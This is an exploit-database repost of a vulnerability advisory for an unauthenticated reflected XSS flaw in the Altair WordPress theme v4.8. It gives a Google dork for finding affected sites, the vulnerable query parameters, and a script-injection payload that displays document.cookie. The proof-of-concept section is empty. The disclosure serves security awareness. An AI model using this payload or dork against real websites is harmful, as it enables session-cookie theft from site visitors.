Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020110068
Below is a copy:
Altair WordPress theme v4.8 – Unauthenticated Reflected XSS
[+] :: Exploit Title: Altair WordPress theme v4.8 - Unauthenticated Reflected XSS [+] :: Google Dork: inurl:/wp-content/themes/altair/ [+] :: Date: 2020-09-10 [+] :: Exploit Author: Ex.Mi [ https://ex-mi.ru ] [+] :: Vendor: ThemeGoods [ https://themegoods.com ] [+] :: Software Version: 4.8 [+] :: Software Link: https://themeforest.net/item/tour-travel-agency-altair-theme/9318575 [+] :: Tested on: Kali Linux [+] :: CVE: [+] :: CWE: CWE-79 [i] :: Info: An Unauthenticated Reflected XSS vulnerability was discovered in the Altair theme v4.8 for WordPress. Vulnerable parameters: keyword, start_date, start_date_raw, end_date, end_date_raw, budget. [$] :: Payload: "><img src=x onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);> [!] :: PoC:
Copyright ©2022 Exploitalert.